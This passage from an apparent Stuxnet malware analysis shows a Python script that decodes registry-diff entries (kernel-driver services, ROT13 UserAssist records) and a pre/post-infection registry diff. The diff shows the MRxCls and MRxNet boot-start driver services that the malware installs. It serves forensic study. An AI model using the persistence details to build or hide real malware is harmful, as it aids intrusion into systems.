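HKLM\SYSTEM\CurrentControlSet\Services\Browser\Start: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\Browser\Type: 0x00000020
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_PGYFRFFVBA: 81 9C 54 0E 05 00 00 00
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\ZJ\Ybgf bs Fghkarg\fazj\znyjner.rkr: 04 00 00 00 06 00 00 00 50 13 53 27 90 93 CA 01
"""

SERVICE_KERNEL_DRIVER = "0x00000001"
SERVICE_RE = re.compile(r"\\Services\\([^\\]+)\\(ImagePath|Start|Type)$")
USERASSIST_RE = re.compile(r"\\UserAssist\\\{[0-9A-Fa-f-]+\}\\Count\\(.+)$")


def parse_diff(text):
    """Split 'path: value' lines; the value follows the last ': ' since paths contain ':'."""
    return [tuple(line.rsplit(": ", 1)) for line in text.strip().splitlines()]


def driver_services(entries):
    """Group Services\\<name>\\{ImagePath,Start,Type} and keep kernel drivers (Type 0x1)."""
    svc = {}
    for path, value in entries:
        m = SERVICE_RE.search(path)
        if m:
            svc.setdefault(m.group(1), {})[m.group(2)] = value.strip('"')
    return {name: v for name, v in svc.items() if v.get("Type") == SERVICE_KERNEL_DRIVER}


def decode_userassist(entries):
    """Decode XP UserAssist entries into (name, session, runs, last_run)."""
    results = []
    for path, value in entries:
        m = USERASSIST_RE.search(path)
        if not m:
            continue
        name = codecs.decode(m.group(1), "rot13")      # Explorer ROT13s the value name
        raw = bytes.fromhex(value)
        if len(raw) != 16:                              # e.g. UEME_CTLSESSION is 8 bytes
            continue
        # XP layout (assumption of this example): session id, run count, FILETIME
        session, count, filetime = struct.unpack("<IIQ", raw)
        # FILETIME counts 100 ns ticks from 1601-01-01 UTC
        last_run = datetime(1601, 1, 1) + timedelta(microseconds=filetime // 10)
        # XP stores the run count biased by 5: a program run once is stored as 6
        results.append((name, session, count - 5, last_run))
    return results


if __name__ == "__main__":
    entries = parse_diff(DIFF_LINES)
    for name, v in driver_services(entries).items():
        print("kernel driver:", name, v.get("ImagePath"), "Start", v.get("Start"))
    for name, session, runs, last_run in decode_userassist(entries):
        print(name, "| session", session, "| runs", runs, "| last run", last_run)
```

Start 0x1 on a Type 0x1 service is SERVICE_SYSTEM_START, i.e. the driver loads during boot before any user logs on, which is what you would expect of a loader like MRxCls; the Browser service lines show the Type filter dropping an ordinary Win32 service from the report.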

Here were the overall changes in the registry comparing the pre-infection and post-infection snapshots. Two things to keep in mind while reading it. First, the comparison was evidently run with the snapshots in reverse order: the MRxCls/MRxNet keys did not exist before infection yet appear under "deleted", so read "deleted" as "added by the infection". Second, the HKU entries (ShellBags, UserAssist, MUICache, WinRAR) are artifacts of the analyst's own activity in the VM, browsing to the sample folder and running the sample and Autoruns, not of Stuxnet itself, as is the Cryptography\RNG\Seed churn. The UserAssist value names are ROT13-encoded, which is why they read as HRZR_EHACNGU:P:\Qbphzragf... (UEME_RUNPATH:C:\Documents...):

 ----------------------------------  
 Keys deleted: 23  
 ----------------------------------  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell  
 ----------------------------------  
 Values deleted: 110  
 ----------------------------------  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\NextInstance: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Service: "MRxCls"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Legacy: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\ConfigFlags: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Class: "LegacyDriver"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\DeviceDesc: "MRXCLS"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control\*NewlyCreated*: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control\ActiveService: "MRxCls"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\NextInstance: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Service: "MRxNet"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Legacy: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\ConfigFlags: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Class: "LegacyDriver"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\DeviceDesc: "MRXNET"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control\*NewlyCreated*: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control\ActiveService: "MRxNet"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Description: "MRXCLS"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\DisplayName: "MRXCLS"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\ErrorControl: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Group: "Network"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Start: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Type: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Data: ... C4 87 21 91 4F D0 6E FA C4 DD B7 C9 AF E2 AE FE 14 0F 53 C4 BA DD 31 1A 38 7B 37 C0 9E 83 FF 2C B2 4C 88 33 C1 89 E5 CA 68 31 2D 20 CE 50 64 7B 39 C7 FB B1 9F A9 0D 6C 2A 82 AE 7F 25 43 A7 A2 28 EB 27 73 C9 45 F9 FD 53 A8 F4 A7 FD B4 90 B2 28 D8 0C 5A A8 84 D0 7F ED 99 25 18 FE B8 4C 48 66 8D 59 40 F6 CC 30 A6 F4 04 E8 76 9C EA 0E F6 A4 4A CE D2  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\0: "Root\LEGACY_MRXCLS\0000"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\Count: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\NextInstance: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Description: "MRXNET"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\DisplayName: "MRXNET"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\ErrorControl: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Group: "Network"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Start: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Type: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\0: "Root\LEGACY_MRXNET\0000"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\Count: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\NextInstance: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\NextInstance: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Service: "MRxCls"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Legacy: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\ConfigFlags: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Class: "LegacyDriver"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\DeviceDesc: "MRXCLS"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control\*NewlyCreated*: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control\ActiveService: "MRxCls"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\NextInstance: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Service: "MRxNet"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Legacy: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\ConfigFlags: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Class: "LegacyDriver"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\DeviceDesc: "MRXNET"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control\*NewlyCreated*: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control\ActiveService: "MRxNet"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Description: "MRXCLS"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\DisplayName: "MRXCLS"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ErrorControl: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Group: "Network"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Start: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Type: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Data: ... DA C4 87 21 91 4F D0 6E FA C4 DD B7 C9 AF E2 AE FE 14 0F 53 C4 BA DD 31 1A 38 7B 37 C0 9E 83 FF 2C B2 4C 88 33 C1 89 E5 CA 68 31 2D 20 CE 50 64 7B 39 C7 FB B1 9F A9 0D 6C 2A 82 AE 7F 25 43 A7 A2 28 EB 27 73 C9 45 F9 FD 53 A8 F4 A7 FD B4 90 B2 28 D8 0C 5A A8 84 D0 7F ED 99 25 18 FE B8 4C 48 66 8D 59 40 F6 CC 30 A6 F4 04 E8 76 9C EA 0E F6 A4 4A CE D2  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\0: "Root\LEGACY_MRXCLS\0000"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\Count: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\NextInstance: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Description: "MRXNET"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\DisplayName: "MRXNET"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ErrorControl: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Group: "Network"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Start: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Type: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\0: "Root\LEGACY_MRXNET\0000"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\Count: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\NextInstance: 0x00000001  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY:gvzrqngr.pcy: 04 00 00 00 06 00 00 00 00 54 07 85 81 FE CF 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\ZJ\Ybgf bs Fghkarg\fazj\znyjner.rkr: 04 00 00 00 06 00 00 00 50 13 53 27 90 93 CA 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0: 34 00 31 00 00 00 00 00 2C 3C 8C 70 10 00 73 6E 6D 77 00 00 20 00 03 00 04 00 EF BE 2C 3C 8C 70 2C 3C 8C 70 14 00 00 00 73 00 6E 00 6D 00 77 00 00 00 14 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0\NodeSlot: 0x00000022  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0\MRUListEx: FF FF FF FF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "Documents"  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Mode: 0x00000006  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ScrollPos1280x720(1).x: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ScrollPos1280x720(1).y: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Sort: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\SortDir: 0x00000001  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Col: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ColInfo: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FD DF DF FD 0F 00 06 00 28 00 10 00 34 00 48 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 B4 00 60 00 78 00 78 00 B4 00 B4 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MinPos1280x720(1).x: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MinPos1280x720(1).y: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MaxPos1280x720(1).x: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MaxPos1280x720(1).y: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).left: 0x000000CB  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).top: 0x00000034  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).right: 0x000003EB  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).bottom: 0x0000028C  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Rev: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WFlags: 0x00000000  

23 deleted keys, 110 values deleted, 17 values modified. Total = 150 changes.

Overall, there's a lot to this rootkit. I didn't go into the MRxCls configuration file decryption, the network changes and attack methods, the other zero-day exploitation methods, etc., but even so you can see that this is a pretty sophisticated piece of malware. However, as we have now seen, its biggest downfall was its complete lack of protection.

The only personal explanation I have for this is that the creator(s) were either rushed to get it done by some deadline, so they focused on the main code rather than on obfuscation, or they simply assumed it would never escape its original intended environment, so reverse engineering would never be a concern.
